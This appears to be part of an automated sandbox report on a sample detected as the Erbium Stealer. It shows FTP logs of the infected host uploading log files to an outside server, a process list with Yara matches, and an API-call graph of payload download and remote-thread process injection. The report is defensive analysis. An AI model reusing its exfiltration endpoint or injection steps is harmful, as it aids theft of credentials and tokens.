                                                                                                                                    Oct 10, 2022 06:04:00.254158020 CEST5009921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.20.txt
                                                                                                                                    Oct 10, 2022 06:04:00.279001951 CEST2150099185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:04:00.303189993 CEST2150099185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:04:00.506329060 CEST2150101185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:04:00.506568909 CEST2150101185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:04:00.506830931 CEST2150101185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:04:00.510740042 CEST5010121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:04:00.533427954 CEST2150101185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:04:00.533653021 CEST5010121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:04:00.556642056 CEST2150101185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:04:00.556883097 CEST5010121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:04:00.579621077 CEST2150101185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:04:00.580363989 CEST5010121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:04:00.603432894 CEST2150101185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:04:00.604617119 CEST5010121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:04:00.627298117 CEST2150101185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:04:00.636674881 CEST5010121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:04:00.659693956 CEST2150101185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,240)
                                                                                                                                    Oct 10, 2022 06:04:00.689316988 CEST5010121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.21.txt
                                                                                                                                    Oct 10, 2022 06:04:00.715101004 CEST2150101185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:04:00.739571095 CEST2150101185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:04:00.960526943 CEST2150103185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:04:00.960788965 CEST2150103185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:04:00.960827112 CEST2150103185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:04:00.961635113 CEST5010321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:04:00.985811949 CEST2150103185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:04:00.990964890 CEST5010321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:04:01.016140938 CEST2150103185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:04:01.018764019 CEST5010321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:04:01.043174982 CEST2150103185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:04:01.046770096 CEST5010321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:04:01.072282076 CEST2150103185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:04:01.075522900 CEST5010321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:04:01.099437952 CEST2150103185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:04:01.100778103 CEST5010321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:04:01.124942064 CEST2150103185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,241)
                                                                                                                                    Oct 10, 2022 06:04:01.151654005 CEST5010321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.22.txt
                                                                                                                                    Oct 10, 2022 06:04:01.176651001 CEST2150103185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:04:01.213092089 CEST2150103185.106.92.60192.168.2.3226 Transfer OK

                                                                                                                                    Click to jump to process

                                                                                                                                    Click to jump to process

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Click to jump to process

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:06:01:55
                                                                                                                                    Start date:10/10/2022
                                                                                                                                    Path:C:\Users\user\Desktop\EgNIXduB6T.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\Desktop\EgNIXduB6T.exe
                                                                                                                                    Imagebase:0xe20000
                                                                                                                                    File size:7168 bytes
                                                                                                                                    MD5 hash:31D7DFE9C9F72BC7AD828091531E6544
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_ErbiumStealer, Description: Yara detected Erbium Stealer, Source: 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_ErbiumStealer, Description: Yara detected Erbium Stealer, Source: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    Reputation:low

                                                                                                                                    Target ID:1
                                                                                                                                    Start time:06:02:03
                                                                                                                                    Start date:10/10/2022
                                                                                                                                    Path:C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe
                                                                                                                                    Imagebase:0xc20000
                                                                                                                                    File size:909312 bytes
                                                                                                                                    MD5 hash:77276DDC82248473D033E2494C438A97
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:06:02:14
                                                                                                                                    Start date:10/10/2022
                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe"
                                                                                                                                    Imagebase:0x1300000
                                                                                                                                    File size:192000 bytes
                                                                                                                                    MD5 hash:8DD297E546397E6982E7350E4F9F154A
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                    • Detection: 45%, ReversingLabs
                                                                                                                                    Reputation:low

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:12.7%
                                                                                                                                      Dynamic/Decrypted Code Coverage:92%
                                                                                                                                      Signature Coverage:8.9%
                                                                                                                                      Total number of Nodes:1049
                                                                                                                                      Total number of Limit Nodes:41
                                                                                                                                      execution_graph 6380 611ff70 6381 611ff8e 6380->6381 6392 611ff30 6381->6392 6393 611ff42 6392->6393 6394 611ff4f 6392->6394 6395 611c26c _ValidateLocalCookies 5 API calls 6393->6395 6395->6394 6280 6127930 6281 6127942 6280->6281 6283 6127950 6280->6283 6282 611c26c _ValidateLocalCookies 5 API calls 6281->6282 6282->6283 5375 1450000 5379 145004e 5375->5379 5376 1450160 LoadLibraryA 5376->5379 5378 145020a 5381 611c249 5378->5381 5379->5376 5379->5378 5382 611c252 5381->5382 5383 611c257 5381->5383 5402 611ced3 5382->5402 5387 611c113 5383->5387 5389 611c11f ___scrt_is_nonwritable_in_current_image 5387->5389 5388 611c148 dllmain_raw 5391 611c162 dllmain_crt_dispatch 5388->5391 5399 1450279 5388->5399 5389->5388 5390 611c143 5389->5390 5389->5399 5406 60a51a0 5390->5406 5391->5390 5391->5399 5393 611c183 5394 611c1b4 5393->5394 5396 60a51a0 __DllMainCRTStartup@12 4 API calls 5393->5396 5395 611c1bd dllmain_crt_dispatch 5394->5395 5394->5399 5397 611c1d0 dllmain_raw 5395->5397 5395->5399 5398 611c19b 5396->5398 5397->5399 5414 611c063 5398->5414 5401 611c1a9 dllmain_raw 5401->5394 5403 611cee9 5402->5403 5405 611cef2 5403->5405 5666 611ce86 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5403->5666 5405->5383 5407 60a51de 5406->5407 5441 60a7330 5407->5441 5409 60a5303 5447 60a5350 5409->5447 5411 60a5312 5412 60a5318 CreateThread 5411->5412 5413 60a532d __DllMainCRTStartup@12 5411->5413 5412->5413 5460 607e200 5412->5460 5413->5393 5416 611c06f ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 5414->5416 5415 611c078 5415->5401 5416->5415 5417 611c0a0 5416->5417 5418 611c10b 5416->5418 5462 611bcac 5417->5462 5483 611cb7f IsProcessorFeaturePresent 5418->5483 5421 611c0a5 5471 611bef4 5421->5471 5423 611c112 ___scrt_is_nonwritable_in_current_image 5424 611c12e 5423->5424 5425 611c148 dllmain_raw 5423->5425 5427 611c143 5423->5427 5424->5401 5425->5424 5428 611c162 dllmain_crt_dispatch 5425->5428 5426 611c0aa __RTC_Initialize __DllMainCRTStartup@12 5474 611be4d 5426->5474 5431 60a51a0 __DllMainCRTStartup@12 4 API calls 5427->5431 5428->5424 5428->5427 5434 611c183 5431->5434 5433 611c1b4 5433->5424 5435 611c1bd dllmain_crt_dispatch 5433->5435 5434->5433 5436 60a51a0 __DllMainCRTStartup@12 4 API calls 5434->5436 5435->5424 5437 611c1d0 dllmain_raw 5435->5437 5438 611c19b 5436->5438 5437->5424 5439 611c063 __DllMainCRTStartup@12 95 API calls 5438->5439 5440 611c1a9 dllmain_raw 5439->5440 5440->5433 5451 60a8c80 5441->5451 5444 60a73c0 5445 60a73da lstrcmpiW 5444->5445 5446 60a73f0 __DllMainCRTStartup@12 5444->5446 5445->5444 5445->5446 5446->5409 5448 60a5370 5447->5448 5450 60a538d __DllMainCRTStartup@12 5448->5450 5453 60ab4b6 5448->5453 5450->5411 5452 60a7378 GetPEB 5451->5452 5452->5444 5454 60ab4c4 Concurrency::cancel_current_task 5453->5454 5457 611dbb4 5454->5457 5456 60ab4d2 5458 611dbfb RaiseException 5457->5458 5459 611dbce 5457->5459 5458->5456 5459->5458 5461 607e20d ___scrt_uninitialize_crt 5460->5461 5463 611bcb1 ___scrt_release_startup_lock 5462->5463 5464 611bcb5 5463->5464 5467 611bcc1 __DllMainCRTStartup@12 5463->5467 5487 613a182 5464->5487 5466 611bcbf 5466->5421 5468 611bcce 5467->5468 5491 6139515 5467->5491 5468->5421 5562 611d2e3 InterlockedFlushSList 5471->5562 5475 611be59 5474->5475 5479 611be6f 5475->5479 5569 613a33c 5475->5569 5477 611be67 5574 61201b3 5477->5574 5480 611c105 5479->5480 5649 611bccf 5480->5649 5484 611cb95 __DllMainCRTStartup@12 5483->5484 5485 611cc40 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5484->5485 5486 611cc8b __DllMainCRTStartup@12 5485->5486 5486->5423 5488 613a18e __EH_prolog3 5487->5488 5502 6139eda 5488->5502 5490 613a1b5 __DllMainCRTStartup@12 5490->5466 5492 6139542 5491->5492 5501 6139553 5491->5501 5519 61395dd GetModuleHandleW 5492->5519 5495 6139591 5495->5421 5526 61393dd 5501->5526 5503 6139ee6 ___scrt_is_nonwritable_in_current_image 5502->5503 5510 613173c EnterCriticalSection 5503->5510 5505 6139ef4 5511 613a092 5505->5511 5510->5505 5512 613a0b1 5511->5512 5513 6139f01 5511->5513 5512->5513 5514 613e946 ___free_lconv_mon 14 API calls 5512->5514 5515 6139f29 5513->5515 5514->5513 5518 6131784 LeaveCriticalSection 5515->5518 5517 6139f12 5517->5490 5518->5517 5520 6139547 5519->5520 5520->5501 5521 6139642 GetModuleHandleExW 5520->5521 5522 6139695 5521->5522 5523 6139681 GetProcAddress 5521->5523 5524 61396b1 5522->5524 5525 61396a8 FreeLibrary 5522->5525 5523->5522 5524->5501 5525->5524 5527 61393e9 ___scrt_is_nonwritable_in_current_image 5526->5527 5541 613173c EnterCriticalSection 5527->5541 5529 61393f3 5542 613942a 5529->5542 5531 6139400 5546 613941e 5531->5546 5534 61395ac 5550 6139620 5534->5550 5537 61395ca 5539 6139642 __DllMainCRTStartup@12 3 API calls 5537->5539 5538 61395ba GetCurrentProcess TerminateProcess 5538->5537 5540 61395d2 ExitProcess 5539->5540 5541->5529 5544 6139436 ___scrt_is_nonwritable_in_current_image 5542->5544 5543 613949d __DllMainCRTStartup@12 5543->5531 5544->5543 5545 613a182 __DllMainCRTStartup@12 14 API calls 5544->5545 5545->5543 5549 6131784 LeaveCriticalSection 5546->5549 5548 613940c 5548->5495 5548->5534 5549->5548 5555 6140a67 GetPEB 5550->5555 5553 613962a GetPEB 5554 61395b6 5553->5554 5554->5537 5554->5538 5556 6139625 5555->5556 5557 6140a81 5555->5557 5556->5553 5556->5554 5559 61400b0 5557->5559 5560 614002d ___std_exception_copy 5 API calls 5559->5560 5561 61400cc 5560->5561 5561->5556 5563 611d2f3 5562->5563 5564 611befe 5562->5564 5563->5564 5566 612af01 5563->5566 5564->5426 5567 613e946 ___free_lconv_mon 14 API calls 5566->5567 5568 612af19 5567->5568 5568->5563 5570 613a347 5569->5570 5571 613a359 ___scrt_uninitialize_crt 5569->5571 5572 613a355 5570->5572 5580 61282be 5570->5580 5571->5477 5572->5477 5575 61201c6 5574->5575 5576 61201bc 5574->5576 5575->5479 5624 6126ae0 5576->5624 5583 612814b 5580->5583 5586 612803f 5583->5586 5587 612804b ___scrt_is_nonwritable_in_current_image 5586->5587 5594 613173c EnterCriticalSection 5587->5594 5589 61280c1 5603 61280df 5589->5603 5590 6128055 ___scrt_uninitialize_crt 5590->5589 5595 6127fb3 5590->5595 5594->5590 5596 6127fbf ___scrt_is_nonwritable_in_current_image 5595->5596 5606 612a956 EnterCriticalSection 5596->5606 5598 6127fc9 ___scrt_uninitialize_crt 5602 6128002 5598->5602 5607 6128259 5598->5607 5620 6128033 5602->5620 5623 6131784 LeaveCriticalSection 5603->5623 5605 61280cd 5605->5572 5606->5598 5608 612826e ___std_exception_copy 5607->5608 5609 6128280 5608->5609 5610 6128275 5608->5610 5612 61281f0 ___scrt_uninitialize_crt 74 API calls 5609->5612 5611 612814b ___scrt_uninitialize_crt 78 API calls 5610->5611 5613 612827b 5611->5613 5614 612828a 5612->5614 5615 6127d7b ___std_exception_copy 41 API calls 5613->5615 5614->5613 5617 613c640 ___scrt_uninitialize_crt 41 API calls 5614->5617 5616 61282b8 5615->5616 5616->5602 5618 61282a1 5617->5618 5619 613e8c9 ___scrt_uninitialize_crt 45 API calls 5618->5619 5619->5613 5621 612a96a ___scrt_uninitialize_crt LeaveCriticalSection 5620->5621 5622 6128021 5621->5622 5622->5590 5623->5605 5625 6126aea 5624->5625 5626 61201c1 5624->5626 5632 6127bb2 5625->5632 5628 6127a48 5626->5628 5629 6127a72 5628->5629 5630 6127a53 5628->5630 5629->5575 5631 6127a5d DeleteCriticalSection 5630->5631 5631->5629 5631->5631 5637 6127a8c 5632->5637 5635 6127be4 TlsFree 5636 6127bd8 5635->5636 5636->5626 5638 6127aad 5637->5638 5639 6127aa9 5637->5639 5638->5639 5640 6127b15 GetProcAddress 5638->5640 5642 6127b06 5638->5642 5644 6127b2c LoadLibraryExW 5638->5644 5639->5635 5639->5636 5640->5639 5642->5640 5643 6127b0e FreeLibrary 5642->5643 5643->5640 5645 6127b43 GetLastError 5644->5645 5646 6127b73 5644->5646 5645->5646 5647 6127b4e ___vcrt_FlsFree 5645->5647 5646->5638 5647->5646 5648 6127b64 LoadLibraryExW 5647->5648 5648->5638 5654 613a36c 5649->5654 5652 6126ae0 ___vcrt_uninitialize_ptd 6 API calls 5653 611c10a 5652->5653 5653->5415 5657 613cefa 5654->5657 5658 611bcd6 5657->5658 5659 613cf04 5657->5659 5658->5652 5661 614023f 5659->5661 5662 614002d ___std_exception_copy 5 API calls 5661->5662 5663 614025b 5662->5663 5664 6140264 5663->5664 5665 6140276 TlsFree 5663->5665 5664->5658 5666->5405 6085 5f04a9e 6086 5f04aa3 6085->6086 6087 5f04b20 6085->6087 6119 5f39760 6086->6119 6088 5f39760 43 API calls 6087->6088 6090 5f04d20 6088->6090 6090->6090 6091 5f39760 43 API calls 6090->6091 6092 5f04f14 6091->6092 6092->6092 6093 5f39760 43 API calls 6092->6093 6094 5f05110 6093->6094 6095 5f39760 43 API calls 6094->6095 6096 5f05300 6095->6096 6096->6096 6097 5f39760 43 API calls 6096->6097 6098 5f054f4 6097->6098 6098->6098 6099 5f39760 43 API calls 6098->6099 6100 5f056e5 6099->6100 6100->6100 6101 5f39760 43 API calls 6100->6101 6102 5f058e4 6101->6102 6103 5f39760 43 API calls 6102->6103 6104 5f05ae0 6103->6104 6104->6104 6105 5f39760 43 API calls 6104->6105 6106 5f05cd4 6105->6106 6106->6106 6107 5f39760 43 API calls 6106->6107 6108 5f05ed0 6107->6108 6108->6108 6109 5f39760 43 API calls 6108->6109 6110 5f060c4 6109->6110 6111 5f39760 43 API calls 6110->6111 6112 5f062c0 6111->6112 6113 5f39760 43 API calls 6112->6113 6114 5f064b0 6113->6114 6134 5f396f0 6114->6134 6117 5f396f0 43 API calls 6118 5f0682b 6117->6118 6123 5f39776 ___scrt_uninitialize_crt 6119->6123 6124 5f3979e 6119->6124 6120 5f3987e 6154 5f38bc0 6120->6154 6122 5f39883 6159 5f38af0 6122->6159 6123->6087 6124->6120 6125 5f397d9 6124->6125 6126 5f3980d 6124->6126 6125->6122 6127 611bb6d 43 API calls 6125->6127 6129 5f397f9 ___scrt_uninitialize_crt 6126->6129 6138 611bb6d 6126->6138 6127->6129 6133 5f39860 6129->6133 6149 612ba62 6129->6149 6133->6087 6135 5f39713 6134->6135 6136 5f39760 43 API calls 6135->6136 6137 5f0666b 6136->6137 6137->6117 6142 611bb72 6138->6142 6140 611bb8c 6140->6129 6141 6139184 ___std_exception_copy 2 API calls 6141->6142 6142->6140 6142->6141 6144 5f38af0 Concurrency::cancel_current_task 6142->6144 6165 612c0b8 6142->6165 6143 611bb98 6143->6143 6144->6143 6145 611dbb4 Concurrency::cancel_current_task RaiseException 6144->6145 6146 5f38b0c 6145->6146 6172 611cf99 6146->6172 6150 612b99e ___std_exception_copy 41 API calls 6149->6150 6151 612ba71 6150->6151 6152 612ba7f ___std_exception_copy 11 API calls 6151->6152 6153 612ba7e 6152->6153 6189 60ab4d3 6154->6189 6157 611cf99 ___std_exception_copy 42 API calls 6158 5f38bf3 6157->6158 6158->6122 6160 5f38afe Concurrency::cancel_current_task 6159->6160 6161 611dbb4 Concurrency::cancel_current_task RaiseException 6160->6161 6162 5f38b0c 6161->6162 6163 611cf99 ___std_exception_copy 42 API calls 6162->6163 6164 5f38b33 6163->6164 6164->6087 6170 613eb8f ___std_exception_copy 6165->6170 6166 613ebcd 6167 613027e ___std_exception_copy 14 API calls 6166->6167 6169 613ebcb 6167->6169 6168 613ebb8 RtlAllocateHeap 6168->6169 6168->6170 6169->6142 6170->6166 6170->6168 6171 6139184 ___std_exception_copy 2 API calls 6170->6171 6171->6170 6173 5f38b33 6172->6173 6174 611cfa6 6172->6174 6173->6129 6174->6173 6175 612c0b8 ___std_exception_copy 15 API calls 6174->6175 6176 611cfc3 6175->6176 6177 611cfd3 6176->6177 6180 613c5e6 6176->6180 6179 612af01 ___std_exception_copy 14 API calls 6177->6179 6179->6173 6181 613c602 6180->6181 6182 613c5f4 6180->6182 6183 613027e ___std_exception_copy 14 API calls 6181->6183 6182->6181 6185 613c61a 6182->6185 6188 613c60a 6183->6188 6184 612ba52 ___std_exception_copy 41 API calls 6186 613c614 6184->6186 6185->6186 6187 613027e ___std_exception_copy 14 API calls 6185->6187 6186->6177 6187->6188 6188->6184 6206 60ab2b9 6189->6206 6192 611dbb4 Concurrency::cancel_current_task RaiseException 6193 60ab4f2 6192->6193 6209 60ab30e 6193->6209 6196 611dbb4 Concurrency::cancel_current_task RaiseException 6197 60ab512 6196->6197 6212 60ab351 6197->6212 6200 611dbb4 Concurrency::cancel_current_task RaiseException 6201 60ab532 6200->6201 6216 6011670 6201->6216 6204 611dbb4 Concurrency::cancel_current_task RaiseException 6205 5f38bca 6204->6205 6205->6157 6219 5f38a00 6206->6219 6210 5f38a00 std::invalid_argument::invalid_argument 42 API calls 6209->6210 6211 60ab320 6210->6211 6211->6196 6213 60ab365 std::regex_error::regex_error 6212->6213 6214 5f38a00 std::invalid_argument::invalid_argument 42 API calls 6213->6214 6215 60ab36e 6214->6215 6215->6200 6217 611cf99 ___std_exception_copy 42 API calls 6216->6217 6218 601169d 6217->6218 6218->6204 6220 611cf99 ___std_exception_copy 42 API calls 6219->6220 6221 5f38a2d 6220->6221 6221->6192 6284 5f00420 6301 611b950 CryptAcquireContextW 6284->6301 6286 5f00430 6286->6286 6304 5f38b60 6286->6304 6289 5f38b60 42 API calls 6290 5f00820 6289->6290 6290->6290 6291 5f38b60 42 API calls 6290->6291 6292 5f00a14 6291->6292 6293 5f38b60 42 API calls 6292->6293 6294 5f00c10 6293->6294 6294->6294 6295 5f38b60 42 API calls 6294->6295 6296 5f00e04 6295->6296 6297 5f38b60 42 API calls 6296->6297 6298 5f01000 6297->6298 6307 611bea2 6298->6307 6302 611b96d CryptCreateHash 6301->6302 6303 611b97f 6301->6303 6302->6303 6303->6286 6305 611cf99 ___std_exception_copy 42 API calls 6304->6305 6306 5f00624 6305->6306 6306->6289 6310 611be75 6307->6310 6311 611be84 6310->6311 6312 611be8b 6310->6312 6316 613a16c 6311->6316 6319 613a1e9 6312->6319 6315 5f0100a 6317 613a1e9 44 API calls 6316->6317 6318 613a17e 6317->6318 6318->6315 6322 6139f35 6319->6322 6323 6139f41 ___scrt_is_nonwritable_in_current_image 6322->6323 6330 613173c EnterCriticalSection 6323->6330 6325 6139f4f 6331 6139f90 6325->6331 6327 6139f5c 6341 6139f84 6327->6341 6330->6325 6332 6139fab 6331->6332 6333 613a01e ___std_exception_copy 6331->6333 6332->6333 6334 6139ffe 6332->6334 6344 6133959 6332->6344 6333->6327 6334->6333 6336 6133959 44 API calls 6334->6336 6337 613a014 6336->6337 6339 613e946 ___free_lconv_mon 14 API calls 6337->6339 6338 6139ff4 6340 613e946 ___free_lconv_mon 14 API calls 6338->6340 6339->6333 6340->6334 6379 6131784 LeaveCriticalSection 6341->6379 6343 6139f6d 6343->6315 6345 6133981 6344->6345 6346 6133966 6344->6346 6348 6133990 6345->6348 6353 612c007 6345->6353 6346->6345 6347 6133972 6346->6347 6349 613027e ___std_exception_copy 14 API calls 6347->6349 6360 613eb26 6348->6360 6352 6133977 __DllMainCRTStartup@12 6349->6352 6352->6338 6354 612c012 6353->6354 6355 612c027 HeapSize 6353->6355 6356 613027e ___std_exception_copy 14 API calls 6354->6356 6355->6348 6357 612c017 6356->6357 6358 612ba52 ___std_exception_copy 41 API calls 6357->6358 6359 612c022 6358->6359 6359->6348 6361 613eb33 6360->6361 6362 613eb3e 6360->6362 6372 613eb8f 6361->6372 6364 613eb46 6362->6364 6365 613eb4f ___std_exception_copy 6362->6365 6366 613e946 ___free_lconv_mon 14 API calls 6364->6366 6367 613eb54 6365->6367 6368 613eb79 HeapReAlloc 6365->6368 6371 6139184 ___std_exception_copy 2 API calls 6365->6371 6370 613eb3b 6366->6370 6369 613027e ___std_exception_copy 14 API calls 6367->6369 6368->6365 6368->6370 6369->6370 6370->6352 6371->6365 6373 613ebcd 6372->6373 6378 613eb9d ___std_exception_copy 6372->6378 6374 613027e ___std_exception_copy 14 API calls 6373->6374 6376 613ebcb 6374->6376 6375 613ebb8 RtlAllocateHeap 6375->6376 6375->6378 6376->6370 6377 6139184 ___std_exception_copy 2 API calls 6377->6378 6378->6373 6378->6375 6378->6377 6379->6343 5058 e216f0 5061 e212f0 5058->5061 5100 e21000 WinHttpOpen 5061->5100 5063 e21311 WinHttpOpen 5064 e2134a MultiByteToWideChar 5063->5064 5065 e2133e 5063->5065 5066 e21371 5064->5066 5067 e2137b MultiByteToWideChar 5064->5067 5065->5064 5066->5066 5066->5067 5068 e21398 WinHttpConnect 5067->5068 5069 e213b1 5067->5069 5068->5069 5069->5069 5070 e213e9 MultiByteToWideChar 5069->5070 5071 e21400 5070->5071 5071->5071 5072 e2140a MultiByteToWideChar 5071->5072 5073 e21420 5072->5073 5073->5073 5074 e2142a MultiByteToWideChar 5073->5074 5075 e21440 5074->5075 5075->5075 5076 e2144a MultiByteToWideChar 5075->5076 5077 e21476 5076->5077 5077->5077 5078 e21578 5077->5078 5079 e2152e WinHttpOpenRequest 5077->5079 5081 e216d8 5078->5081 5083 e21595 GetSystemInfo 5078->5083 5084 e215aa VirtualAlloc 5078->5084 5079->5078 5080 e21550 WinHttpSendRequest 5079->5080 5080->5078 5082 e2156d WinHttpReceiveResponse 5080->5082 5082->5078 5083->5084 5085 e215d3 WinHttpQueryDataAvailable 5084->5085 5086 e21680 5085->5086 5097 e215ea 5085->5097 5087 e21691 5086->5087 5088 e2168e WinHttpCloseHandle 5086->5088 5089 e21699 WinHttpCloseHandle 5087->5089 5090 e2169c 5087->5090 5088->5087 5089->5090 5091 e216a7 GetCurrentProcess 5090->5091 5092 e216a4 WinHttpCloseHandle 5090->5092 5131 e21700 LoadLibraryA 5091->5131 5092->5091 5093 e21621 VirtualAlloc 5093->5097 5094 e2160c GetSystemInfo 5094->5093 5095 e21658 WinHttpReadData 5095->5086 5095->5097 5097->5085 5097->5086 5097->5093 5097->5094 5097->5095 5099 e216ca VirtualFree 5099->5081 5101 e21030 5100->5101 5101->5101 5102 e21039 MultiByteToWideChar 5101->5102 5103 e21054 5102->5103 5103->5103 5104 e2105d MultiByteToWideChar 5103->5104 5105 e21076 WinHttpConnect 5104->5105 5106 e2108d 5104->5106 5105->5106 5106->5106 5107 e210c0 MultiByteToWideChar 5106->5107 5108 e210d5 5107->5108 5108->5108 5109 e210df MultiByteToWideChar 5108->5109 5110 e21101 5109->5110 5110->5110 5111 e21138 WinHttpOpenRequest 5110->5111 5112 e2117f 5110->5112 5111->5112 5113 e21158 WinHttpSendRequest 5111->5113 5114 e212da 5112->5114 5116 e2119b GetSystemInfo 5112->5116 5117 e211ae VirtualAlloc 5112->5117 5113->5112 5115 e21174 WinHttpReceiveResponse 5113->5115 5114->5063 5115->5112 5116->5117 5118 e211d5 WinHttpQueryDataAvailable 5117->5118 5119 e21271 5118->5119 5130 e211ea 5118->5130 5120 e21281 5119->5120 5121 e2127e WinHttpCloseHandle 5119->5121 5122 e2128b 5120->5122 5123 e21288 WinHttpCloseHandle 5120->5123 5121->5120 5124 e21292 WinHttpCloseHandle 5122->5124 5125 e21295 VirtualFree 5122->5125 5123->5122 5124->5125 5125->5063 5126 e21206 GetSystemInfo 5127 e21219 VirtualAlloc 5126->5127 5127->5130 5128 e2124c WinHttpReadData 5128->5119 5128->5130 5130->5118 5130->5119 5130->5126 5130->5127 5130->5128 5132 e217e2 5131->5132 5133 e2173d 9 API calls 5131->5133 5134 e2182a VirtualAllocEx 5132->5134 5136 e216c3 5132->5136 5133->5132 5135 e21851 VirtualProtectEx WriteProcessMemory 5134->5135 5134->5136 5135->5136 5140 e218da 5135->5140 5136->5081 5136->5099 5137 e2195e VirtualAllocEx 5137->5136 5138 e21992 WriteProcessMemory 5137->5138 5138->5136 5141 e219d4 VirtualAllocEx 5138->5141 5139 e2191b WriteProcessMemory 5139->5136 5139->5140 5140->5137 5140->5139 5141->5136 5142 e21a1d WriteProcessMemory 5141->5142 5142->5136 5143 e21a75 CreateRemoteThread 5142->5143 5143->5136 5144 e21ad5 5143->5144 5144->5136 5145 e21aed GetExitCodeProcess 5144->5145 5145->5136 5146 e21b0f ReadProcessMemory 5145->5146 5146->5136 5147 e21b85 Sleep 5146->5147 5147->5144 5148 612af01 5151 613e946 5148->5151 5152 613e951 RtlFreeHeap 5151->5152 5156 612af19 5151->5156 5153 613e966 GetLastError 5152->5153 5152->5156 5154 613e973 ___free_lconv_mon 5153->5154 5157 613027e 5154->5157 5160 613cd7a GetLastError 5157->5160 5159 6130283 5159->5156 5161 613cd90 5160->5161 5162 613cd96 5160->5162 5183 614027e 5161->5183 5166 613cd9a 